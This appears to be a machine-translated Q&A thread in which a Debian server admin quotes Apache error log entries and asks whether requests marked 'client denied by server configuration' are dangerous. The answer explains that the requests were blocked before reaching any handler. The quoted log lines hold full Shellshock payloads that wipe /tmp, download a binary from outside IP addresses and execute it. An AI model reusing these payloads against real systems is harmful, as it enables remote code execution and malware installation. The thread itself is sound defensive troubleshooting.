我有一台装有 Debian 7 的服务器。我正在检查 Apache 错误日志文件,看到几行这样的内容
[Fri Mar 20 04:56:48 2015] [error] [client 222.66.95.253] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bbce >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bbce >> /tmp/Run.sh;echo /tmp/China.Z-bbce >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
[Mon Mar 16 16:58:15 2015] [error] [client 210.35.74.116] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.180.31.43:9574/xudpASD -O /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
我可能搞错了,但因为这部分() { :; };
我认为有人试图使用炮弹休克漏洞。
但不管这是否是 shellshock,问题是 - 如果我在日志中有包含消息的行
client denied by server configuration
这是我应该担心的事情吗,或者因为请求被拒绝,我可以忽略它 - 确保没有下载/执行恶意脚本?
答案1
“服务器配置拒绝客户端”表示请求被阻止Require 指令(在旧版本的 Apache 中,允许/拒绝指令),由重写规则或由其他 Apache 模块执行。具体来说,这意味着请求从未传递给外部处理程序,因此漏洞利用没有机会运行。客户端立即收到 403 Forbidden 错误。